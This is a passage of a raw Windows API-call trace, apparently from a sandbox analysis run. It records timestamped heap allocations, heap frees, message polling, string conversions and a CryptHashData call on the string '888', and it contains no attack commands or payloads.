RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0254.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0254.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0254.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0254.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0254.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.687] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0254.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0254.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0254.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0254.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0254.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0254.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0254.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e516d0 [0254.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e516d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0254.787] CryptHashData (hHash=0xa86f50, pbData=0x2e54df8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0254.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0254.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0254.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0254.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0254.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0254.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0254.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0254.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0254.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0254.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0254.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0254.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0254.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0254.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0254.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0254.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0254.792] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.792] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0254.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0254.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0254.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0254.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0254.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0254.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 